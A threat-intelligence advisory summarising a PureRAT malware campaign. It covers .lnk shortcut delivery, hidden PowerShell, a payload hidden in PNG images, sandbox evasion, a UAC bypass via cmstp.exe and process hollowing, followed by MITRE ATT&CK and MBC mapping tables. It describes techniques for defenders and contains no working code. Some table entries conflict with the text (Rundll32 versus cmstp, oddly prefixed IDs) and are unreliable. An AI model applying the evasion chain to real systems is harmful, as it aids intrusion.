EXECUTIVE SUMMARY:
A new malware campaign has been discovered, using a remote access trojan (RAT) called PureRAT to compromise Windows systems. The campaign stands out for its ability to hide malicious code inside ordinary-looking PNG image files. This technique, known as fileless execution, reflects a growing shift in how malware is delivered while staying hidden.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
A new malware campaign has been discovered, using a remote access trojan (RAT) called PureRAT to compromise Windows systems. The campaign stands out for its ability to hide malicious code inside ordinary-looking PNG image files. This technique, known as fileless execution, reflects a growing shift in how malware is delivered while staying hidden.[emaillocker id="1283"]
The attack begins with a malicious .lnk file, a Windows shortcut that most users trust because it resembles files used to open regular applications. When a victim opens this shortcut, a concealed PowerShell command launches silently without the user’s knowledge. This command contacts a remote server and retrieves a PNG image holding the malicious payload, embedded using steganography. The image looks completely normal but hidden inside is a Base64-encoded portable executable (PE) file ready to be decoded and loaded into system memory. The multi-stage infection chain uses heavy obfuscation techniques throughout, making it difficult to detect. The malware checks for VMware and QEMU environments to detect virtual analysis sandboxes, immediately terminating if found.
PureRAT performs host fingerprinting, gathering details on installed security products, hardware identifiers, and user privileges. It bypasses user account control (UAC) via cmstp .exe and uses process hollowing into the legitimate msbuild .exe binary to run malicious code under a trusted Windows process. To mitigate this threat, users should be trained to recognize the risks of opening unexpected .lnk shortcut files or email attachments, even those appearing to come from trusted sources.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1204.002 | User Execution | Malicious File |
| Defence Evasion | T1027 | Obfuscated Files or Information | - |
| Defence Evasion | T1036.005 | Masquerading | Match Legitimate Resource Name or Location |
| Defence Evasion | T1218.011 | System Binary Proxy Execution | Rundll32 |
| Collection | T1005 | Data from Local System | - |
| Command and control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Anti-Static Analysis | B0032 | Executable Code Obfuscation |
| Anti-Behavioral Analysis | B0003 | Dynamic Analysis Evasion |
| Execution | E1204 | User Execution |
| Anti-Static Analysis | E1027 | Obfuscated Files or Information |
| Discovery | E1082 | System Information Discovery |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Command & Control | B0030 | C2 Communication |
| Defense Evasion | B0029 | Polymorphic Code |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/new-purerat-campaign-hides-pe-payloads/
https://www.trellix.com/blogs/research/purerat-fileless-utilizing-steganography-process-hollowing/
[/emaillocker]